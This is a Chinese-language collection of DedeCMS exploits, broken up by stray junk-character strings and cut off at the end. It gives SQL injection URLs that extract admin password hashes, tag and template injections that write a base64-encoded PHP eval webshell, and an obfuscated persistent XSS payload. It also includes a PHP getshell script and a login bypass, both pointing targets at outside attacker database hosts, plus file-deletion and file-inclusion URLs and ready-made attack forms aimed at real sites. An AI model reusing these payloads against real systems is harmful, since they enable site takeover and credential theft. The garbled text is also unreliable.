|
|
Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1" g0 q% Y+ }7 \& d
6 v6 E8 [1 Y* a5 C7 U' M& E1 U# N0 `$ y
; `3 z3 [& J% x( `. H
: C3 l$ o$ T6 l% ^, Z* D( b" S) j4 |7 @ P
7 }" q8 |4 c a8 j' Y0 [' {) o
; H3 A7 l& |, h* w0 f9 ]
DedeCms v5.6 嵌入恶意代码执行漏洞
$ `; n" D( E, `" Y( |6 V+ C注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}- L E% |0 T# E i2 n
发表后查看或修改即可执行( W) n2 P0 h1 B4 {0 q9 N, W
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}' C0 N7 ~6 _: H4 \( V! w7 ?1 b( g
生成x.php 密码xiao,直接生成一句话。
8 n5 U# N, I5 _+ }) r
; Q+ }4 n$ O4 z% _: M
) a) G( |' r* g2 ~2 B
" m: l- e/ {" p4 r2 |* l/ n# S4 ]2 N7 \0 X; n& L5 N: a& G! u7 c
* `" K4 j( J, y5 Z7 o) L5 D# L1 D6 j, d2 `( {0 u% h* w
$ m8 y7 x6 g9 o+ B9 h
Dede 5.6 GBK SQL注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( ~) _3 L' p8 c! a% T
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe4 [5 q6 z. Y7 S% d2 b. O+ V! ^# {
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A74 \; G% S4 S# N: r/ k
" P5 N4 F% e+ D6 G- z3 b7 ]
, h9 }* J" a2 c. t& }' Y3 E! U% M ^6 ?- C
* V' N2 ~6 R @- I! v e4 l
! Z: s" C1 y) K% \- N! g- E4 `6 N- J9 {, f w
7 g5 W2 O% ~! O. i- t E, {: ]
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
& a m/ H7 m5 m6 z. t# O/ j
7 y7 k% ~; X) q7 W1 y/ h, {5 j. i2 t D4 n5 |/ u- v/ g
/ J+ z; H" [, q5 j
- K1 d: X) D9 L4 b6 ~: m( M U
7 S1 ]4 h: r2 g& C/ o( P2 b$ H
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ! h$ D( n t# B7 D3 F" w# i
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="6 h; r5 V+ ]- Z N/ R
6 b) |. w8 N% {" Y( C/ a9 o- N7 Q/ [4 L) e/ [& ^
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ' ^4 N* m+ v* V' U
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda7 t- f5 S3 p4 u0 i5 d k
0 Q6 S. D- F& m- m$ S4 x
/ ? s5 t9 G1 A- w6 E0 v1 l9 G `; V$ zhttp://v57.demo.dedecms.com/dede/login.php2 t$ e6 w5 }+ ^5 [! {8 Q0 M
3 t2 k0 Q. ~) r8 Y4 B$ i+ B7 v
DeDeCMS(织梦)变量覆盖getshell
#!usr/bin/php -w8 x* }5 T( N, h6 j8 \
<?php
, x" v. b* g4 g. t6 T e; L: D$ t A4 E+ oerror_reporting(E_ERROR);" E! d# |/ n- r( i
set_time_limit(0);: W2 w# M2 Q- P9 V
print_r('& h6 L4 j) s Z* L3 m! D
DEDEcms Variable Coverage @! k0 U6 O7 [
Exploit Author: www.heixiaozi.comwww.webvul.com
9 K# v+ g& U- n);) W4 k$ O$ F% Z3 o; X
echo "\r\n";
# j8 [+ U- t0 r) ]1 z# ?if($argv[2]==null){( }: x3 V% e8 ~% B( f
print_r('9 \2 P# F$ C& N0 ?: ?
+---------------------------------------------------------------------------+& s: s' P6 d6 l+ M1 }( H
Usage: php '.$argv[0].' url aid path
& Q, d& x3 K2 g; r. k2 L: Iaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
% {0 Q$ ]. d9 x% d0 T0 hExample:
5 V! ?; }; |( m8 B) s5 a5 sphp '.$argv[0].' www.site.com 1 old9 B: I, }1 R2 \% C4 e* s* U& H! Q( i
+---------------------------------------------------------------------------+
! q1 }9 m" g3 r) x9 X$ Q');6 J$ c+ y5 P4 ? X5 | r, M
exit;
/ V" l: j$ ~1 h. V) {9 P/ f}0 G/ F* I( l8 b) T4 B1 Q
$url=$argv[1];- c0 S3 C6 @1 K$ Z- W A
$aid=$argv[2];
0 ^2 i6 [" J/ @ g# {7 r6 z$path=$argv[3];
) r1 ^) b$ t, m" f( @- E$exp=Getshell($url,$aid,$path);/ W2 B. P4 \2 | u' V8 F5 r9 I
if (strpos($exp,"OK")>12){2 x* s0 M& p9 C
echo "
$ z2 a2 o. r: m8 j- \) xExploit Success \n";
2 K3 S! p, ]5 b1 J/ Z5 g$ u8 ~if($aid==1)echo "; G7 _ S$ v: X6 }) o
Shell:".$url."/$path/data/cache/fuck.php\n" ;" y- n5 ~# A: W1 J
1 ^$ m8 f8 H" w; t; O. C1 i! v/ e9 w4 A& ^4 {; n2 D6 F1 j
if($aid==2)echo "
* v8 F/ i" O; L: X+ A0 gShell:".$url."/$path/fuck.php\n" ;
( o% V0 B+ R: G' {
) \# P, r" o- n( k7 Z" P- k) j
7 ^! I; O3 J- k" `if($aid==3)echo "# H" A2 q; E: F# k% N
Shell:".$url."/$path/plus/fuck.php\n";2 z @ t) p, {3 z0 |
, f, m: r0 A# n6 h, c' k; @* k" ]3 w3 F
}else{0 N1 s ^* z6 ]; n9 F' ^* J0 l
echo "0 P3 M1 N3 |* l% x7 A# ~( h' K- k
Exploit Failed \n";) g4 S3 L2 l* x3 R
}8 j6 Y! A, n+ p! k7 ?& W! m
function Getshell($url,$aid,$path){8 f+ N* l& w. z: I! f. _1 ]6 T1 |
$id=$aid;4 W6 k' O% B |6 M, k& Q
$host=$url;
+ x. M5 L8 u) m$port="80";. O! a0 N& V% b7 t( n" T
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
) W8 Y9 s% u a7 P$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";6 C; S9 N3 A$ g w* u; N( I5 H: {4 p7 H
$data .= "Host: ".$host."\r\n";
2 W# K( W! c9 M# ]1 w$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
# M" d9 ^6 V( a- Q- B7 e$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+ N3 F% u( A& p b. q$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
/ {8 i o. _3 I: B2 F9 `. j//$data .= "Accept-Encoding: gzip,deflate\r\n";
: K' o& I4 F X: b$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
3 b; I" Y4 ]( T Y0 |$data .= "Connection: keep-alive\r\n";* H T* O( U6 Q' i1 C9 J3 R" E/ M& c9 D
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
7 h# y; g3 `9 M( Q, ^8 ]$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
, o ^1 i2 ^: a/ H9 A3 C8 [$data .= $content."\r\n";2 `/ z+ q: c. b% z+ C; P
$ock=fsockopen($host,$port);
/ z, C: X# y1 v% r' X9 d7 aif (!$ock) {, N( W- D9 J& z/ p& I: c2 z
echo "6 x! q/ d# q" D+ d+ ], e
No response from ".$host."\n";! w) y( p3 D' t
}
9 T n2 T9 @! p2 G* Y& Z, sfwrite($ock,$data);
% n0 S/ i: k- k1 r. v7 Gwhile (!feof($ock)) {4 |7 N! ~, E8 y# E
$exp=fgets($ock, 1024);2 \. y; X! L; Q
return $exp;
% C$ _/ D* a, D0 n% r2 H}
2 K6 j- Z: V# |1 _: X}2 B, f9 h9 e5 r4 C& Z2 k
6 e* C4 e/ Z9 r, m& r- }$ a
2 ^$ @8 a4 d) _1 e' @2 X0 u?>( s, c' L: i; b! l) y
/ |0 S, @% e, i' D) Q
. f2 ^* L2 l% X9 |% F4 E3 \& u4 C- v& v9 A- {
5 u& X0 N7 `8 T, ?; U
! K7 n, n' q0 z; ~$ ?
; @' ~) r3 N) X
' p% Q) ^$ r4 N. b* W" ^! z6 x0 P* o2 {4 q. ?0 Z) {
) I7 o$ |* g! X& Z! e) u
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
3 Y2 _! _4 F8 f" C" Q$ R) w& thttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root y0 }; X; M1 I% f" Z
- F2 ~) q+ T; i' g p" q. w w1 D0 Y/ c! E3 A# h
把上面validate=dcug改为当前的验证码,即可直接进入网站后台* b9 u) S7 u1 u
$ c1 b" b4 h; x/ Q
7 H) Z$ z2 }+ g7 g4 [2 z
此漏洞的前提是必须得到后台路径才能实现
+ ^; X& ~ A7 `1 I- g
4 _7 K2 f+ c7 P8 R: V# i1 \4 u# @5 L8 N% A5 E
* V9 W( E" ]+ L$ | L; F
1 H1 F9 r$ B* C. i
8 K" K2 l, v" `# g- l7 k* e- ?' ^1 J
5 z) k' B; o# u q! S7 K9 i- M
" J0 ?! t" z% L; V2 [
Dedecms织梦 标签远程文件写入漏洞
& o _4 j# @0 a! s前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* T9 E9 o% L- A/ |
! ~+ @0 z- }# G2 `1 @9 U6 _8 X" v! ^. K8 N! F W
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" y5 D/ J2 H& U2 \9 S7 L; [! j# x<form action="" method="post" name="QuickSearch" id="QuickSearch">
! [ @2 d$ j/ f6 Q3 H. {: \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. {4 u- F" E& F# U
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />' s. b; x; u4 Z3 q$ s2 [, B
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) S% G6 f* @* o+ M
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! T8 t' D( M2 P0 X) g8 K9 v3 M$ `2 ?
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 z: O- @% A7 b4 N) P
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 C8 R( @. p: n4 ?$ S; Q0 H<input type="text" value="true" name="nocache" style="width:400">( O3 g* K. q: t! C4 @/ h, P
<input type="submit" value="提交" name="QuickSearchBtn"><br />5 v2 x A0 Z3 J+ \
</form>$ ^& {. R4 @; ?4 L: }
<script>- D2 q: a3 b; ~
function addaction()
8 j; X7 K8 L8 V& G6 } p! S1 ?{$ c; g! T/ B0 o0 ]/ W) T
document.QuickSearch.action=document.QuickSearch.doaction.value;
. z& T8 @9 |: U6 f( P5 E}$ c Z* J6 ~+ f, d) h4 @0 p" l
</script>
* q4 h5 E- w6 @ l8 P' E( D$ D/ h& E9 m A
3 G4 U. h- k8 ^+ K9 j5 `- i
* d D5 P2 M7 T
. }$ E% n: h7 j
. \, o8 f' G- t; @
2 s0 g7 R/ j' ^ d6 r6 j+ L3 a0 H [' s2 i( I0 u, t
5 N9 H! K+ R, f& m4 `% E
* W/ O1 ?) h- ]0 |* M
DedeCms v5.6 嵌入恶意代码执行漏洞
, D/ O' H6 ?. V) M8 ~7 t: e注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
8 ~3 J+ A8 X2 P- A+ X' Za{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
5 |$ S& t/ h# ?/ R2 s生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得: U; p+ B# d) I' r. k4 q0 `, j
Dedecms <= V5.6 Final模板执行漏洞
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
2 Y1 y( @4 M7 e2 muploads/userup/2/12OMX04-15A.jpg
+ r+ g+ N( m2 b
* Z8 Q. J- ?) V6 r7 i! R! i9 y, z1 S, V/ I+ l
模板内容是(如果限制图片格式,加gif89a):4 a( w3 L. I9 W3 w8 L a2 r. Q
{dede:name runphp='yes'}/ F$ S8 _ J4 u& ?# z, S: }+ G9 s/ \
$fp = @fopen("1.php", 'a');
7 @2 `0 l. {3 j& t; {: _7 [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");9 v* o% w' `5 S. j# \: e
@fclose($fp);
/ Y/ E; {" q$ P1 \% ^" G8 V{/dede:name}
+ F: U- w' g& o2 修改刚刚发表的文章,查看源文件,构造一个表单:
) R2 c6 O, K! a/ Y- t! E4 V. W) p<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
8 p4 B$ h- k- v7 q<input type="hidden" name="dopost" value="save" />" s$ Y6 B* J' `9 h& K8 C
<input type="hidden" name="aid" value="2" />- L% l4 b* }, o7 O4 d
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
; x5 h, V/ x* W) | }4 C& b<input type="hidden" name="channelid" value="1" />
Z9 W8 I- ?: g$ ?4 T<input type="hidden" name="oldlitpic" value="" />. P- U9 r( j% ]; n5 z+ Y; U
<input type="hidden" name="sortrank" value="1275972263" />
g4 I3 Z0 O/ a$ {6 E0 e* b6 X4 C7 V/ Z: u* o7 t6 x
1 g( a+ a7 i7 G( `# o# q<div id="mainCp">
' @8 ^) D( z! ~ x* w4 p% f& u& v<h3 class="meTitle"><strong>修改文章</strong></h3>
- a2 Y& d$ B' m- y9 b; _9 p P' }+ z( ?3 J" W
: d4 b: G" g4 c( {* j8 A M/ s4 _; I
<div class="postForm">8 R) K7 x3 F& }9 v) _
<label>标题:</label>
* h$ a6 b1 O2 |7 y, R<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
# ?5 h' L' E& T; [5 E( J) \8 d5 E# g3 }) k+ b! V# ]
! O) ~2 c$ ~7 X
<label>标签TAG:</label>( g% n# ]: ]% H8 q- _$ W2 p0 D
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
E5 b E* a, z7 Q0 Y# g9 k8 z) |! m+ {2 ~# ]4 K3 z
( r1 q# s$ Y5 f3 `! I<label>作者:</label>2 @# T& n. C: \4 o `1 w
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
+ D. n2 U! P9 i- T) M$ V* {6 @$ ?) }+ F$ h' l% P+ Q
/ r5 n( v R# p* a g) @<label>隶属栏目:</label>
( ^ x9 @% e5 L7 A% e1 q% c<select name='typeid' size='1'>0 |9 C' e7 ^8 A/ O6 ~( F9 C
<option value='1' class='option3' selected=''>测试栏目</option>4 l) a4 a( T5 X5 C/ H0 u* `' i
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
, d3 s+ z# r( y# p0 X5 B+ G8 O4 y: k# ?7 R4 D, u) K. F9 i
2 ^6 V8 _0 |: a7 A% v<label>我的分类:</label>$ q: H. T; k2 K, {' I& \
<select name='mtypesid' size='1'>1 ] p- O0 `: P1 c
<option value='0' selected>请选择分类...</option>1 ~% G" }) s7 Z- @
<option value='1' class='option3' selected>hahahha</option> {9 C8 h& y! p/ w$ X8 J/ E
</select>2 y5 [4 m% a" Y0 B4 z' q0 z, h/ D5 b9 F; A
* B2 @1 x8 z& J, X8 A# c, q
2 Y8 ]0 M" ?* o% `% I
<label>信息摘要:</label>: ]- T9 r7 k8 n4 K/ ?
<textarea name="description" id="description">1111111</textarea>6 o& ]. i% \+ f [3 A
(内容的简要说明), d# \3 e. _- X( w. Z4 d
0 y% J) \$ u' h8 ^" U
2 p, \* E) E) u, A' h& z
<label>缩略图:</label>
# ]. T& D) o( a0 _5 `<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) ^' w/ Y! T' W; R, B6 Q1 L- F- R3 g( X, e# H, K% J* t
" m7 W0 F5 J T<input type='text' name='templet'' W3 {, f5 _6 _" ?2 \; ]
value="../ uploads/userup/2/12OMX04-15A.jpg">' u1 ]( h, ]+ Q4 h1 e3 ~# {
<input type='text' name='dede_addonfields'6 L! c$ O# q% O" p
value="templet,htmltext;">(这里构造)2 h% j: E) M! [5 r
</div>
# S1 i' D. c9 Y& F! j
. o7 d; v/ c; k8 \: M. i. V8 v6 e! k6 S1 R
<!-- 表单操作区域 -->
* S& G( K. R! t" _ b+ c<h3 class="meTitle">详细内容</h3>
( T9 U! Z6 J, o; U. ^" Y
l* ]% @/ S! m, y8 t0 w K1 f
; S y' z" x/ n; N9 W0 q/ E4 D4 \<div class="contentShow postForm">1 [4 i0 f8 G2 c" N- |+ e5 [
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
' v. l$ r$ W, }) B) V; h E
- [) ?' A- {) G1 S& i8 Z2 Z
$ w( ]! X! T8 w6 H8 y, Y" Q<label>验证码:</label>
' ~/ w) ?# T7 C9 j0 e u. p<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) c/ K% [/ N$ J8 O+ P" x' u<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
# Y1 l* K- a5 D
3 g: \4 \5 Z) I
0 C+ z$ k7 j% a9 D5 s<button class="button2" type="submit">提交</button>
1 Z- I! L+ G7 ?* R. S4 r<button class="button2 ml10" type="reset">重置</button>7 w! x$ ?$ e5 \9 g: B& }
</div>' { E+ t1 h8 K( h
6 E+ H! L: H. |
8 r0 N8 W' W/ g' C% c0 p
</div>
" t1 F. q E, u+ [! p0 u3 E9 m: w" ]
F6 H! o9 h* w* t4 I2 J</form>% q/ H5 L4 S" k6 d
9 l- @& E) }: r# ^9 m
0 Q% S2 M( i1 A4 ?9 _$ K. P$ f
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:" Q2 Z) I \2 ^( ]5 X9 t
假设刚刚修改的文章的aid为2,则我们只需要访问:6 q* y/ S+ ], H! h2 G1 Q* g/ H
http://127.0.0.1/dede/plus/view.php?aid=2& z7 y0 j3 y% U8 L
即可以在plus目录下生成webshell:1.php
0 _* S- ]( k# w6 c( T& R9 ]2 }9 l/ F5 O( Z1 N& C' ?' _
! ^) g3 r* I0 @8 M' `4 f& @& i0 ~+ H, s3 q( [* p
: T( n" n0 \, a. [# O; ]" V) @$ G" X
( }" a# n) Z3 j( w( K% `$ i8 i" G
d; H- l$ m: t( ?$ D
7 Q2 f1 k5 c7 k5 z4 |
" o6 H' I! }$ E' p3 E, w! y' j
9 X1 E& j3 r8 ^ Q* F5 |: A! k7 {8 {4 m% f2 X6 h! ~5 r
/ c; J/ F+ F1 R1 g" d8 f( \% h* O, G
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
2 G( H n7 n- g; HGif89a{dede:field name='toby57' runphp='yes'}7 N9 T. z) n, c# Y1 z
phpinfo();3 E7 C! T2 n1 f( z; G4 E" U! ?
{/dede:field}- }& u& o1 E1 H
保存为1.gif o" ?' n0 I1 p7 ]
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
. M# [2 o, d: d4 F6 @5 O<input type="hidden" name="aid" value="7" />
! @3 [5 y, ^* i- w% x- n4 S<input type="hidden" name="mediatype" value="1" />
! U* g+ s4 C, }* w) k; h<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
$ e6 P9 T6 g6 J' F/ {<input type="hidden" name="dopost" value="save" /> $ f* Z8 G+ K) ~8 I7 J. V8 O
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 0 C; V# Q8 o8 K
<input name="addonfile" type="file" id="addonfile"/>
2 P5 f1 d" y0 Q! b<button class="button2" type="submit" >更改</button> 3 s* s9 W- u+ b6 w: U( {
</form>
. P. Q v1 s: Y ^5 q4 [1 a$ E+ c9 @5 K
2 `# @0 P4 o# k
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif& v' ^7 M6 t) {, i6 u+ d5 E, `
发表文章,然后构造修改表单如下:
% s! F4 H: |$ F& W, U" S! F0 _" z" A2 R+ I) n9 r) k& A Q: H8 g
2 s2 t$ `4 U4 H+ A1 d: z% O
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
% Z( `# j9 Z x" R# J: W+ }<input type="hidden" name="dopost" value="save" />
' W+ o) ]& U; U% \' g" t<input type="hidden" name="aid" value="2" /> 8 S+ @: ?- X! Z. \2 K* \
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
# T. [, o7 B d$ M: w<input type="hidden" name="channelid" value="1" /> + M0 W$ c' l% T+ _2 G
<input type="hidden" name="oldlitpic" value="" />
' b# L% g1 ^$ Y9 u- Z8 d4 M7 G<input type="hidden" name="sortrank" value="1282049150" />
1 ^0 c2 }9 r6 I0 L& u; L7 o0 I<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 [+ Z' G& H1 n, j3 A6 x8 Z
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
3 N) ?/ G8 ^! F! @! d8 }<select name='typeid' size='1'> 5 W5 I) _9 E$ p" s- g
<option value='1' class='option3' selected=''>Test</option>
; u+ f: Q ]$ {3 V: w) O, C" Q# w<select name='mtypesid' size='1'> ) ~% f8 V) s2 I) ?
<option value='0' selected>请选择分类...</option>
6 y4 K6 S: P, R" L' A8 o<option value='1' class='option3' selected>aa</option></select> 8 }; ?: V8 j0 @: K, F% _
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * E/ B# G, L) i
<input type='hidden' name='dede_addonfields' value="templet">
6 |# r9 @" ~: ~<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
8 \$ K8 {. f1 @/ R2 c# s5 A<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ' G$ K1 U5 ]7 K+ M3 n. |. V
<button class="button2" type="submit">提交</button>
' F( ]3 e+ |2 V6 ?& B& d: d</form>
- a3 v+ K9 J% O( m& i3 W
X; i& f! x: ?& p9 ]; v2 |2 N5 K" o5 b |' n( m
) b9 T1 ^3 r, m. Y+ c
" y: r+ }! h7 P; ? Q, N; d& g! G+ j# W9 D1 A4 r# K. |, }
. o$ l' c+ q* e7 ]; X0 l) M6 [/ C. n5 J
% L$ v1 ]! `6 r$ u$ o/ P- f
4 X3 f9 E+ v+ p
: z* d/ ^ o0 S% x7 r' ~% b' U/ O$ |3 K# r3 N2 U% u2 `' t
织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif" I7 O" T6 o h: x
d. V6 ?# S. `$ H
) y" G$ i) U* A. R1 L7 A, ^, ]" b
, J# s/ F: {5 L9 d
7 Y' d8 j4 ?# h3 R# t% O9 H
8 n) u2 x+ l" [" [# [( n& e* ]* p6 t
* F2 \4 @ C" y8 M( N0 A
' P$ k G4 q3 U1 e# Y, Q2 Z
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
$ @1 L- ]: k6 x$ T8 K0 W# e* thttp://www.test.com/plus/carbuya ... urn&code=../../) Q9 F" e, A1 z" {+ N
3 |8 q4 L) t5 ? e& u% R7 J% q' S4 Y T1 ^* h& M0 I7 }0 A
- t, I* \- k# [! r% x0 q& x, r% G w
& }7 ^) Q9 A; `; f% s. p7 A. B5 Z3 j* Q
' q1 {' \. J+ l7 Z% h
; \( W/ l/ m; X, R. |, X
3 T" S( z/ H# T6 D/ r' V. n1 [' M3 |) _8 F4 e
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) m3 s, [2 }; d( w4 }- a: bplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`. D) d6 V- U9 m
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD54 ~% Q) c1 V5 D: k4 h
! c2 n; I/ ~* o M
3 m1 P9 @; E' A$ f* V+ p- y$ L6 [ B0 p$ e
, W5 K* V7 P6 ?$ ]& Z; _
; a# l l) n# X$ ?8 [- P( j
5 e! |/ y; e" C2 F3 i! ^# ~$ o. w
) ^) j1 R/ ^0 x
; Z4 H' y* y# Q$ k0 e- V7 {
& O5 ^% G, r! H
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
+ Y% V7 M9 x" f; `( V0 D2 \+ f2 y9 @+ f: z+ i. K, X$ f) L
, Q; s" R6 i$ @0 q; h, A8 Q# s: M
- I: j' I7 y* N' I7 j9 @" Y& U2 ~3 R1 o9 I3 @
* ]1 W8 V% @8 ^& J3 z8 u2 y
7 B( _9 n8 ]- K
+ ?" ?* ]. R* j8 v3 p0 K3 U( k+ C" p
0 D% @% D4 ~9 ~# \
- ^; B) V7 }0 [2 F* |- y$ ]
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
<html>5 K% L2 e4 Q3 s
<head>
) V8 v% `* V" Z! c) H) D/ e<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 ?/ }9 {! H. R# i0 t! _</head>/ B0 A* u/ c) ~4 {& R* y
<body style="FONT-SIZE: 9pt">3 o& Y; {- l4 N$ r- b
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
9 V0 a4 K: D5 U, c4 S$ G6 `0 j<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% F: y) {- y- {. d0 ]9 q. h<input type='hidden' name='activepath' value='/data/cache/' />2 K0 z& O( D& y2 `) ^+ a! D$ H
